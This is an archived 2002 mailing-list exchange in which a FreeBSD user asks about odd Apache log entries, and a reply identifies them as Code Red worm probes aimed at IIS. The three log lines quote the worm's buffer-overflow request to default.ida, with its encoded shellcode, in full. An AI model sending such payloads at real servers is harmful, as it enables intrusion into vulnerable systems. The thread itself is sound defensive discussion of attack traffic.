Could someone help explain this Please?

Ian MacDonald ian at ianm.net
Thu Oct 17 20:00:34 BST 2002 

Hmm looks like the code red worm that did the rounds almost 2 years ago
now. It was designed to attack IIS. You will be ok with Apache against
this.

Good idea though to keep your eye on the httpd security report at
http://httpd.apache.org/security_report.html and any other security
reports/notices for all the apps you use.

Ian.

-----Original Message-----
From: redjupiter [mailto:redjupiter at ntlworld.com]
Sent: 17 October 2002 19:53
To: freebsd-users at uk.freebsd.org
Subject: Could someone help explain this Please?


Hi guys,

While checking my httpd-access.log I came across this entry:


200.13.240.94 - - [17/Oct/2002:09:41:52 +0100] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a  HTTP/1.0" 400 309 "-" "-"

24.157.163.166 - - [17/Oct/2002:09:50:39 +0100] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a  HTTP/1.0" 400 309 "-" "-"

213.70.156.209 - - [12/Oct/2002:16:36:22 +0100] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a  HTTP/1.0" 400 309 "-" "-"

Are these guys trying to buffer overflow apache httpd server?

Am I safe with Apache 2.0.42 version?

thanks for any input.




------ FreeBSD UK Users' Group  -  Mailing List ------
http://listserver.uk.freebsd.org/mailman/listinfo/freebsd-users

More information about the Ukfreebsd mailing list